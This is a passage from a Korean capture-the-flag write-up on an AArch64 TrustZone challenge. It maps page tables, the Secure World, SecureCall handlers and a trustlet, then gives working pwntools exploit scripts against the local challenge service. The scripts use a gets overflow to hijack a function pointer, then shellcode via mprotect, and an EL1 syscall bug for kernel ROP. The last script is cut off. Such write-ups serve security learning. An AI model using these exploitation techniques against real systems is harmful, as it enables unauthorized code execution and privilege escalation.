<li>…</li> <li><code>0x2B: 0x4000004002B4C3</code> (기존과 동일)</li> <li><code>0x2C: 0x4002C443</code> - <code>0x2E: 0x4002E443</code> -&gt; <ul> <li>Page Entry</li> <li>AF = 1</li> <li>AP = 0b01</li> <li>IA = <code>0xnn000</code> (<code>(0 &lt;&lt; 21) + (0xnn &lt;&lt; 12)</code>) (0x2C &lt;= nn &lt;= 0x2E)</li> <li>OA = <code>0x400nn000</code> (0x2C &lt;= nn &lt;= 0x2E)</li> </ul> </li> <li><code>0x2F: 0x4000004002F4C3</code> (기존과 동일)</li> <li>…</li> <li><code>0x3A: 0x4000004003A4C3</code> (기존과 동일)</li> <li><code>0x3B: 0x400000090004C3</code> (기존과 동일)</li> <li><code>0x3C: 0 …</code> (기존과 동일)</li> </ul> </li> <li><code>0x08: 0 …</code> (기존과 동일)</li> </ul> </li> </ul> <h5 id="smc-호출">SMC 호출</h5> <p>EL0 로 넘어가기 전에 <code>SMC 0x00</code> 를 호출한다. 이 때 설정되는 레지스터는 다음과 같다:</p> <ul> <li><code>X0 = 0x83000001</code></li> <li><code>X1 = 0</code></li> <li>`X2 = 0</li> <li><code>X3 = 0</code></li> </ul> <p>그리고 <code>SMC 0x00</code> 이 호출되면 EL2 의 하위 EL 에서 호출되는 <code>Lower EL using AArch64 Synchronous Exception</code> 가 호출된다. 그리고 이 때의 <code>ESR_EL2.EC = 0x17</code> 이므로 TEE-OS 를 초기화한다.</p> <h5 id="el0-로-넘어가면서-el0-의-entrypointstart-호출">EL0 로 넘어가면서 EL0 의 EntryPoint(start) 호출</h5> <p>EL0 으로 넘어가기 위해 사용하는 레지스터는 다음과 같다:</p> <ul> <li><strong>SPSR_EL1</strong>: 0x3c5; E=1, A=1, I=1, F=1, EL0</li> <li><strong>ELR_EL2</strong>: VA:<code>0x4000e8</code> (PA:<code>?</code>)</li> </ul> <p>그리고 <code>ERET</code> 을 통해 EL1 의 EntryPoint 를 실행한다.</p> <h3 id="el0">EL0</h3> <p>EL0 의 EntryPoint 는 bios.bin 의 <code>0x000B_C0F8</code> 에 위치한다. 메모리에 로드되면 EL1_VA:<code>0x4000E8</code>(= PA:<code>0x4000E8</code>) 에 위치한다.<br> 이 부분은 ELF 파일이므로 binwalk 를 사용하면 ELF 를 추출할 수 있다. 또한 심볼도 존재한다.</p> <h3 id="secure-world">Secure World</h3> <p>Secure World 는 <code>PA:0xE40000</code> 에 위치하며, 메모리에 적재되기 전에는 <code>0x20000</code> 에 위치한다. 또한 AArch32 로 작성되어 있다.</p> <h4 id="설정">설정</h4> <p>Secure World 는 EL3 에서 설정된다. 코드 영역은 EL3 의 EntryPoint 에서 <code>0xE40000</code> 로 <code>0x20000</code> 의 값을 복사하면서 설정된다. 이때 유의해야 할 부분은 Secure World 로 넘어갈 때 <code>SPSR=0x1D3</code> 이고 <code>nRW(M[4]=1</code> 이므로 AARCH32 로 동작한다. 그리고 <code>M[3:0]=0b0011</code> 이므로 Supervisor 로 들어간다.</p> <p>그리고 실제로 Secure World 의 초기 상태를 만들고 실행하는 부분은 EL3 의 SMC Handler 에서 진행한다.</p> <h4 id="secure-world-초기화">Secure World 초기화</h4> <p>Secure World 로 부팅되면 여러가지 초기화를 진행하며 여기서 초기화하는 것은 다음과 같다:</p> <ul> <li>MMU 초기화</li> <li>레지스터 설정</li> <li>Exception Handler 설정</li> </ul> <h5 id="mmu-설정-4">MMU 설정</h5> <p>최종적으로 설정되를 Translation Table 은 다음과 같다.</p> <ul> <li><strong>TTBCR</strong>: 0x80802504; EAE=1, EPD=1, SHO=0b10, ORGN0=0b01, IRGN0=0b01, T0SZ=0b100</li> <li><strong>TTBR0</strong>: 0xE44000 -&gt; <ul> <li>0x00: 0…</li> <li>0x08: 0xE4D003 -&gt; <ul> <li>0x00: 0x900060F</li> <li>0x01: 0…</li> </ul> </li> <li>0x09: 0…</li> <li>0x40: 0xE85003 <ul> <li>0x000: 0xE40068F</li> <li>0x001: 0xE40168F</li> <li>0x002: 0xE40268F</li> <li>0x003: 0x2000000E40360F</li> <li>…</li> <li>0x087: 0x2000000E48760F</li> <li>0x088: 0xE48860F</li> <li>0x089: 0xE48960F</li> <li>…</li> <li>0x1FF: 0xE5FF60F</li> </ul> </li> <li>0x41: 0…</li> <li>0x7F: 0xEC4003 -&gt; <ul> <li>0x00: 0x2000000008768F</li> <li>0x01: 0x2000000008868F</li> <li>…</li> <li>0x10: 0x2000000009768F</li> <li>0x11: 0…</li> </ul> </li> <li>0x80: 0…</li> </ul> </li> </ul> <p>위 값들을 해석하면 다음과 같다:</p> <ul> <li><strong>TTBR0</strong>: 0xE44000 -&gt; <ul> <li>0x00: 0…</li> <li>0x08: 0xE4D003 -&gt; <ul> <li>0x00: 0x900060F <ul> <li>AttrIndx[2:0] = 0b011 <ul> <li>Use MAIR0</li> </ul> </li> <li>AP[2:1] = 0b00; Read/write, only at PL1</li> <li>AF = 1</li> <li>SH[1:0] = 0b10; Outer Shareable</li> <li>IA = <code>0x1000000</code> <code>((0x08&lt;&lt;21)+(0x00&lt;&lt;12))</code></li> <li>OA = <code>0x9000000</code></li> </ul> </li> <li>0x01: 0…</li> </ul> </li> <li>0x09: 0…</li> <li>0x40: 0xE85003 <ul> <li>0x000: 0xE40068F ~ 0x002: 0xE40268F <ul> <li>AttrIndx[2:0] = 0b011 <ul> <li>Use MAIR0</li> </ul> </li> <li>AP[2:1] = 0b10; Read-only, only at PL1</li> <li>AF = 1</li> <li>SH[1:0] = 0b10; Outer Shareable</li> <li>IA = <code>0x800n000</code> <code>((0x40&lt;&lt;21)+(0x0n&lt;&lt;12))</code> (0x0 &lt;= n &lt; 0x3)</li> <li>OA = <code>0xE40n000</code> (0x0&lt;= n &lt; 0x3)</li> </ul> </li> <li>0x003: 0x2000000E40360F ~ 0x087: 0x2000000E48760F <ul> <li>AttrIndx[2:0] = 0b011 <ul> <li>Use MAIR0</li> </ul> </li> <li>AP[2:1] = 0b00; Read/write, only at PL1</li> <li>AF = 1</li> <li>PXN = 1</li> <li>SH[1:0] = 0b10; Outer Shareable</li> <li>IA = <code>0x80nn000</code> <code>((0x40&lt;&lt;21)+(0xnn&lt;&lt;12))</code> (0x03 &lt;= nn &lt; 0x88)</li> <li>OA = <code>0xE4nn000</code> (0x03&lt;= n &lt;= 0x88)</li> </ul> </li> <li>0x088: 0xE48860F ~ 0x1FF: 0xE5FF60F <ul> <li>AttrIndx[2:0] = 0b011 <ul> <li>Use MAIR0</li> </ul> </li> <li>AP[2:1] = 0b00; Read/write, only at PL1</li> <li>AF = 1</li> <li>SH[1:0] = 0b10; Outer Shareable</li> <li>IA = <code>0x8nnn000</code> <code>((0x40&lt;&lt;21)+(0xnnn&lt;&lt;12))</code> (0x088 &lt;= nnn &lt; 0x200)</li> <li>OA = <code>0xEnnn000</code> (0x488&lt;= nnn &lt; 0x600)</li> </ul> </li> </ul> </li> <li>0x41: 0…</li> <li>0x7F: 0xEC4003 -&gt; <ul> <li>0x00: 0x2000000008768F ~ 0x10: 0x2000000009768F <ul> <li>AttrIndx[2:0] = 0b011 <ul> <li>Use MAIR0</li> </ul> </li> <li>AP[2:1] = 0b10; Read-only, only at PL1</li> <li>AF = 1</li> <li>PXN = 1</li> <li>SH[1:0] = 0b10; Outer Shareable</li> <li>IA = <code>0xFEnn000</code> <code>((0x7F&lt;&lt;21)+(0xnn&lt;&lt;12))</code> (0x00 &lt;= nn &lt; 0x11)</li> <li>OA = <code>0xnnn00</code> (0x870&lt;= nnn &lt; 0x980)</li> </ul> </li> <li>0x11: 0…</li> </ul> </li> <li>0x80: 0…</li> </ul> </li> </ul> <h5 id="레지스터-설정-1">레지스터 설정</h5> <p>별로 중요하지는 않지만 설정하는 레지스터는 다음과 같다:</p> <ul> <li><strong>PRRR</strong>: 0xff440400; Not used because of TTBCR.EAE. Instead use MAIR0.</li> <li><strong>DACR</strong>: 0x55555555; D0…D15=0b01</li> <li><strong>SCTLR</strong>: I|=1, ITD|=1, C|=1, M|=1</li> <li><strong>CPACR</strong>: ASEDIS|=0, CP11|=0b11, CP10|=0b11</li> </ul> <h5 id="exception-handler-설정-3">Exception Handler 설정</h5> <p>AArch32 의 Exception Handler 는 AArch64 와는 다르게 각 핸들러당 하나의 <code>b &lt;func&gt;</code> 로 이루어져 있다.<br> 그리고 그 핸들러 중에서 Supervisor Exception Handler 는 SEL0 에서 svc 를 호출할 때 호출되며 Data Abort Exception Handler 는 적절하지 않은 범위에 접근할 때 호출된다. 또 중요한 Handler 는 SecureCall 을 처리하는 핸들러이다.</p> <p>Supervisor Exception Handler 의 기능은 다음과 같다:</p> <ul> <li><code>svc #0</code>: Return to normal world</li> <li><code>svc #1</code>: IDK…</li> <li><code>svc #2</code>: Allocate empty page</li> <li><code>svc #3</code>: Free using page</li> </ul> <p>SecureCall 의 기능은 다음과 같다:</p> <ul> <li><code>SECURE_CALL_NUM = 0x83000003</code>: Register WSM</li> <li><code>SECURE_CALL_NUM = 0x83000004</code>: Unregister WSM</li> <li><code>SECURE_CALL_NUM = 0x83000005</code>: Init TrustLet</li> <li><code>SECURE_CALL_NUM = 0x83000006</code>: TCI Call</li> </ul> <h4 id="securecall">SecureCall</h4> <p>하나씩 제대로 살펴보면 다음과 같다.</p> <ul> <li><code>SECURE_CALL_NUM = 0x83000003</code>: Register WSM <ul> <li>0x2000000 에서 0x2400000 까지의 SEL:VA 중에 비어있는 SEL:VA 와 주어진 PA 를 매핑시킨다.</li> <li>주어진 PA 는 NSEL:VA 와 매칭되어야 한다.</li> </ul> </li> <li><code>SECURE_CALL_NUM = 0x83000004</code>: Unregister WSM <ul> <li>주어진 PA 에 맞는 VA 를 할당 해제한다.</li> </ul> </li> <li><code>SECURE_CALL_NUM = 0x83000005</code>: Init TrustLet <ul> <li>주어진 WSM 에 존재하는 TrustLet 을 VA <code>0x1000 (code)</code>, <code>0x2000 (data)</code>, <code>0x100000 (data)</code>, <code>0xFF8000 (?)</code> 에 로드한다. <ul> <li>va = 0x1000, size = 0x1000, prot = 0b1010; NS=0, PXN=1, XN=0, UnprivilegedAccess=1, RO=0</li> <li>va = 0x2000, size = 0x1000, prot = 0b1110; NS=0, PXN=1, XN=1, UnprivilegedAccess=1, RO=0</li> <li>va = 0x100000, size = 0x82000, prot = 0b1110; NS=0, PXN=1, XN=1, UnprivilegedAccess=1, RO=0</li> <li>va = 0xFF8000, size = 0x8000, prot = 0b1110; NS=0, PXN=1, XN=1, UnprivilegedAccess=1, RO=0</li> </ul> </li> <li>이 때 사용하는 모든 Page 정보와 Code 등은 전부 NS 에서 WSM 를 통해 전달하며 S.EL1 에서는 그 trustlet 의 무결성을 전달한다.</li> <li>그리고 이 때 trustlet 의 entrypoint 도 설정한다.</li> </ul> </li> <li><code>SECURE_CALL_NUM = 0x83000006</code>: TCI Call <ul> <li>로드한 trustlet 의 함수를 호출한다.</li> </ul> </li> </ul> <h4 id="trustlet">Trustlet</h4> <p>Trustlet 의 메인 로직은 <code>SEL0_VA:0x126A</code> 에 존재한다. 여기서는 TCI struct 의 cmd 에 맞는 동작을 수행한다.<br> 여기서 수행하는 동작은 load_key 와 save_key 가 있다.</p> <h2 id="exploit">Exploit</h2> <h3 id="nsel0">NS.EL0</h3> <h4 id="익스-방법-1">익스 방법 1</h4> <h5 id="설명">설명</h5> <p><code>main</code> 함수에서 <code>load_trustlet</code> 함수를 통해 TrustedApplication 과 소통을 할 수 있게 초기화한다. 그리고 <code>cmdtb</code> 라는 함수 포인터를 초기화한다.</p> <p><code>run</code> 함수를 통해 실질적인 동작을 수행하는데 이 함수에서는 <code>scanf</code> 를 통해 유저에게 입력을 받는다. <code>scanf</code> 는 <code>gets(input)</code> 를 호출한다. 이때 <code>input</code> 다음에 <code>cmdtb</code> 가 존재하므로 BoF 를 통해 <code>cmdtb</code> 를 변조할 수 있다.</p> <h5 id="플래그-얻기">플래그 얻기</h5> <p>NS.EL0 에는 <code>print_flag</code> 라는 함수가 존재한다. <code>cmdtb</code> 를 변조하여 이 함수를 호출하면 된다.</p> <h5 id="exploitpy">exploit.py</h5> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span><span style="color:#f92672">from</span> pwn <span style="color:#f92672">import</span> <span style="color:#f92672">*</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># context.log_level = &#34;debug&#34;</span> </span></span><span style="display:flex;"><span>context<span style="color:#f92672">.</span>arch <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;aarch64&#34;</span> </span></span><span style="display:flex;"><span>context<span style="color:#f92672">.</span>bits <span style="color:#f92672">=</span> <span style="color:#ae81ff">64</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">load_key</span>(idx: int): </span></span><span style="display:flex;"><span>    p<span style="color:#f92672">.</span>sendlineafter(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;cmd&gt; &#34;</span>, <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;0&#34;</span>) </span></span><span style="display:flex;"><span>    p<span style="color:#f92672">.</span>sendlineafter(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;index: &#34;</span>, str(idx)<span style="color:#f92672">.</span>encode()) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">save_key</span>(idx: int, key: bytes): </span></span><span style="display:flex;"><span>    p<span style="color:#f92672">.</span>sendlineafter(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;cmd&gt; &#34;</span>, <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;1&#34;</span>) </span></span><span style="display:flex;"><span>    p<span style="color:#f92672">.</span>sendlineafter(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;index: &#34;</span>, str(idx)<span style="color:#f92672">.</span>encode()) </span></span><span style="display:flex;"><span>    p<span style="color:#f92672">.</span>sendlineafter(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;key: &#34;</span>, key) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>p <span style="color:#f92672">=</span> remote(<span style="color:#e6db74">&#34;localhost&#34;</span>, <span style="color:#ae81ff">6666</span>) </span></span><span style="display:flex;"><span>elf <span style="color:#f92672">=</span> ELF(<span style="color:#e6db74">&#34;./el0&#34;</span>) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>pl <span style="color:#f92672">=</span> <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;a&#34;</span> <span style="color:#f92672">*</span> <span style="color:#ae81ff">0x100</span> </span></span><span style="display:flex;"><span>pl <span style="color:#f92672">+=</span> p64(elf<span style="color:#f92672">.</span>symbols[<span style="color:#e6db74">&#34;print_flag&#34;</span>]) </span></span><span style="display:flex;"><span>pl <span style="color:#f92672">+=</span> p64(elf<span style="color:#f92672">.</span>symbols[<span style="color:#e6db74">&#34;print_flag&#34;</span>]) </span></span><span style="display:flex;"><span>save_key(<span style="color:#ae81ff">1</span>, pl) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>p<span style="color:#f92672">.</span>recvuntil(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;Flag (EL0): &#34;</span>) </span></span><span style="display:flex;"><span>FLAG <span style="color:#f92672">=</span> p<span style="color:#f92672">.</span>recvline() </span></span><span style="display:flex;"><span>log<span style="color:#f92672">.</span>info(<span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;FLAG : </span><span style="color:#e6db74">{</span>FLAG<span style="color:#f92672">.</span>decode()<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>) </span></span></code></pre></div><h4 id="익스-방법-2">익스 방법 2</h4> <h5 id="설명-1">설명</h5> <p>mprotect 를 통해 R-X 영역을 만들 수 있으므로 쉘코드를 실행할 수 있다. 이를 이용하여 처음에 할당된 BUF 영역에 쉘 코드를 쓰고 R-X 영역으로 만든 뒤에 임의 코드를 실행하여 플래그를 얻을 수 있다.</p> <h5 id="exploitpy-1">exploit.py</h5> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span><span style="color:#f92672">from</span> pwn <span style="color:#f92672">import</span> <span style="color:#f92672">*</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># context.log_level = &#34;debug&#34;</span> </span></span><span style="display:flex;"><span>context<span style="color:#f92672">.</span>arch <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;aarch64&#34;</span> </span></span><span style="display:flex;"><span>context<span style="color:#f92672">.</span>bits <span style="color:#f92672">=</span> <span style="color:#ae81ff">64</span> </span></span><span style="display:flex;"><span>context<span style="color:#f92672">.</span>endian <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;little&#34;</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>DUMMY_VALUE <span style="color:#f92672">=</span> <span style="color:#ae81ff">0xDEAD_BEEF_CAFE_BEBE</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>EL0_STACK_LOW <span style="color:#f92672">=</span> <span style="color:#ae81ff">0x7FFF_7FFF_E000</span> </span></span><span style="display:flex;"><span>EL0_SFP_IN_RUN <span style="color:#f92672">=</span> <span style="color:#ae81ff">0x7FFF_7FFF_FFA0</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>EL0_BUF <span style="color:#f92672">=</span> <span style="color:#ae81ff">0x7FFE_FFFF_D000</span> </span></span><span style="display:flex;"><span>EL0_WSM <span style="color:#f92672">=</span> <span style="color:#ae81ff">0x7FFE_FFFF_E000</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>EL0_LDP_X29_X30_SP_RET <span style="color:#f92672">=</span> <span style="color:#ae81ff">0x0040_00FC</span> </span></span><span style="display:flex;"><span>EL0_LDR_X19_LDP_X29_X30_SP_RET <span style="color:#f92672">=</span> <span style="color:#ae81ff">0x0040_0294</span> </span></span><span style="display:flex;"><span>EL0_RET <span style="color:#f92672">=</span> <span style="color:#ae81ff">0x0040_0100</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">make_shellcode</span>(assembly: str) <span style="color:#f92672">-&gt;</span> bytes: </span></span><span style="display:flex;"><span> shellcode <span style="color:#f92672">=</span> asm(assembly) </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">assert</span> <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">&#34;</span> <span style="color:#f92672">not</span> <span style="color:#f92672">in</span> shellcode </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">return</span> shellcode </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">load_key</span>(idx: int): </span></span><span style="display:flex;"><span> p<span style="color:#f92672">.</span>sendlineafter(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;cmd&gt; &#34;</span>, <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;0&#34;</span>) </span></span><span style="display:flex;"><span> p<span style="color:#f92672">.</span>sendlineafter(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;index: &#34;</span>, str(idx)<span style="color:#f92672">.</span>encode()) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">save_key</span>(idx: int, key: bytes): </span></span><span style="display:flex;"><span> p<span style="color:#f92672">.</span>sendlineafter(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;cmd&gt; &#34;</span>, <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;1&#34;</span>) </span></span><span style="display:flex;"><span> p<span style="color:#f92672">.</span>sendlineafter(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;index: &#34;</span>, str(idx)<span style="color:#f92672">.</span>encode()) </span></span><span style="display:flex;"><span> p<span style="color:#f92672">.</span>sendlineafter(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;key: &#34;</span>, key) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">el0_arbitrary_code_execute</span>(assembly: str) <span style="color:#f92672">-&gt;</span> <span style="color:#66d9ef">None</span>: </span></span><span style="display:flex;"><span> pl <span style="color:#f92672">=</span> <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;a&#34;</span> <span style="color:#f92672">*</span> <span style="color:#ae81ff">0x100</span> </span></span><span style="display:flex;"><span> pl <span style="color:#f92672">+=</span> p64(elf<span style="color:#f92672">.</span>symbols[<span style="color:#e6db74">&#34;gets&#34;</span>]) </span></span><span style="display:flex;"><span> pl <span style="color:#f92672">+=</span> p64(elf<span style="color:#f92672">.</span>symbols[<span style="color:#e6db74">&#34;gets&#34;</span>]) </span></span><span style="display:flex;"><span> save_key(<span style="color:#ae81ff">1</span>, pl) </span></span><span style="display:flex;"><span> pl <span style="color:#f92672">=</span> <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;a&#34;</span> <span style="color:#f92672">*</span> <span style="color:#ae81ff">0x120</span> </span></span><span style="display:flex;"><span> pl <span style="color:#f92672">+=</span> make_shellcode(assembly) </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">assert</span> len(pl) <span style="color:#f92672">&lt;=</span> <span style="color:#ae81ff">0x1000</span> </span></span><span style="display:flex;"><span> p<span style="color:#f92672">.</span>sendline(pl) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> pl <span style="color:#f92672">=</span> <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;a&#34;</span> <span style="color:#f92672">*</span> (<span style="color:#ae81ff">1</span> <span style="color:#f92672">+</span> <span style="color:#ae81ff">4</span>) </span></span><span style="display:flex;"><span> pl <span style="color:#f92672">+=</span> <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\x00</span><span style="color:#e6db74">&#34;</span> <span style="color:#f92672">*</span> (<span style="color:#ae81ff">0x100</span> <span style="color:#f92672">-</span> len(pl)) </span></span><span style="display:flex;"><span> pl <span style="color:#f92672">+=</span> p64(elf<span style="color:#f92672">.</span>symbols[<span style="color:#e6db74">&#34;main&#34;</span>] <span style="color:#f92672">+</span> <span style="color:#ae81ff">0x44</span>) </span></span><span style="display:flex;"><span> pl <span style="color:#f92672">+=</span> p64(elf<span style="color:#f92672">.</span>symbols[<span style="color:#e6db74">&#34;mprotect&#34;</span>]) </span></span><span style="display:flex;"><span> save_key(<span style="color:#ae81ff">0x1000</span>, pl) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> load_key(<span style="color:#ae81ff">1</span>) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> pl <span style="color:#f92672">=</span> <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;a&#34;</span> <span style="color:#f92672">*</span> <span style="color:#ae81ff">0x100</span> </span></span><span style="display:flex;"><span> pl <span style="color:#f92672">+=</span> p64(EL0_RET) </span></span><span style="display:flex;"><span> pl <span style="color:#f92672">+=</span> p64(elf<span style="color:#f92672">.</span>symbols[<span style="color:#e6db74">&#34;gets&#34;</span>]) </span></span><span style="display:flex;"><span> pl <span style="color:#f92672">+=</span> p64(DUMMY_VALUE) </span></span><span style="display:flex;"><span> pl <span style="color:#f92672">+=</span> p64(EL0_SFP_IN_RUN <span style="color:#f92672">-</span> <span style="color:#ae81ff">0x30</span>) </span></span><span style="display:flex;"><span> save_key(<span style="color:#ae81ff">1</span>, pl) </span></span><span style="display:flex;"><span> pl <span style="color:#f92672">=</span> p64(EL0_STACK_LOW <span style="color:#f92672">+</span> <span style="color:#ae81ff">0x100</span>) </span></span><span style="display:flex;"><span> pl <span style="color:#f92672">+=</span> p64(EL0_BUF <span style="color:#f92672">+</span> <span style="color:#ae81ff">0x120</span>) </span></span><span style="display:flex;"><span> p<span style="color:#f92672">.</span>sendline(pl) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>p <span style="color:#f92672">=</span> remote(<span style="color:#e6db74">&#34;localhost&#34;</span>, <span style="color:#ae81ff">6666</span>) </span></span><span style="display:flex;"><span><span style="color:#75715e"># p = process(&#34;../share/run.sh&#34;)</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># p = process(&#34;../share/run_debug.sh&#34;)</span> </span></span><span style="display:flex;"><span>elf <span style="color:#f92672">=</span> ELF(<span style="color:#e6db74">&#34;./el0&#34;</span>) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>el0_arbitrary_code_execute( </span></span><span style="display:flex;"><span> <span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;&#34;&#34; </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> ldr x0, =</span><span style="color:#e6db74">{</span>elf<span style="color:#f92672">.</span>symbols[<span style="color:#e6db74">&#39;print_flag&#39;</span>]<span style="color:#e6db74">}</span><span style="color:#e6db74">;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> blr x0;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> mov x0, #0;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> ldr x1, =</span><span style="color:#e6db74">{</span>elf<span style="color:#f92672">.</span>symbols[<span style="color:#e6db74">&#39;exit&#39;</span>]<span style="color:#e6db74">}</span><span style="color:#e6db74">;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> blr x1;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> &#34;&#34;&#34;</span> </span></span><span style="display:flex;"><span>) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>p<span style="color:#f92672">.</span>interactive() </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>p<span style="color:#f92672">.</span>recvuntil(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;Flag (EL0): &#34;</span>) </span></span><span style="display:flex;"><span>FLAG <span style="color:#f92672">=</span> p<span style="color:#f92672">.</span>recvline() </span></span><span style="display:flex;"><span>log<span style="color:#f92672">.</span>info(<span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;FLAG : </span><span style="color:#e6db74">{</span>FLAG<span style="color:#f92672">.</span>decode()<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>) </span></span></code></pre></div><h3 id="nsel1">NS.EL1</h3> <p>EL0 에서 Arbitrary Code Execute 가 가능하므로 syscall 을 통해 EL1 의 취약점을 트리거 할 수 있다.<br> EL1 의 취약점은 syscall handler 에서 read, write 를 처리하는 부분에 존재한다. read, write 를 하는 과정에서 읽기 또는 쓰기를 수행하는 주소의 권한 (EL0 인지 EL1 인지) 를 검증하지 않는다. 따라서 EL0 에서 read 와 write 를 통해 EL1 의 영역에 읽기 및 쓰기가 가능하다. 그러면 read 를 통해 EL1 의 스택을 바꿔 ROP 를 진행할 수 있다.</p> <p>하지만 한번의 read 를 통해 바꿀 수 있는 값은 1 바이트이므로 return address 를 적절히 바꿔 ROP 가 가능하게 만들어야 한다. syscall handler 의 return address 는 <code>0xFFFFFFFFC000A830</code> 이고 1 바이트만 변경할 수 있으므로 사용할 수 있는 가젯은 제한된다.<br> 내가 찾은 가젯은 <code>0xffffffffc0009430: ldp x19, x20, [sp, #0x10]; ldp x29, x30, [sp], #0x20; ret;</code> 이다. 이 가젯을 통해 <code>0xFFFFFFFFC0019C00</code> 에 존재하는 값을 통해 ROP 를 할 수 있다.</p> <h4 id="get-flag">Get Flag</h4> <p>ROP 를 통해 flag 를 출력해주는 함수를 호출하면 flag 를 얻을 수 있다.</p> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span><span style="color:#f92672">from</span> pwn <span style="color:#f92672">import</span> <span style="color:#f92672">*</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># context.log_level = &#34;debug&#34;</span> </span></span><span style="display:flex;"><span>context<span style="color:#f92672">.</span>arch <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;aarch64&#34;</span> </span></span><span style="display:flex;"><span>context<span style="color:#f92672">.</span>bits <span style="color:#f92672">=</span> <span style="color:#ae81ff">64</span> </span></span><span style="display:flex;"><span>context<span style="color:#f92672">.</span>endian <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;little&#34;</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>DUMMY_VALUE <span style="color:#f92672">=</span> <span style="color:#ae81ff">0xDEAD_BEEF_CAFE_BEBE</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>EL0_STACK_LOW <span style="color:#f92672">=</span> <span style="color:#ae81ff">0x7FFF_7FFF_E000</span> </span></span><span style="display:flex;"><span>EL0_SFP_IN_RUN <span style="color:#f92672">=</span> <span 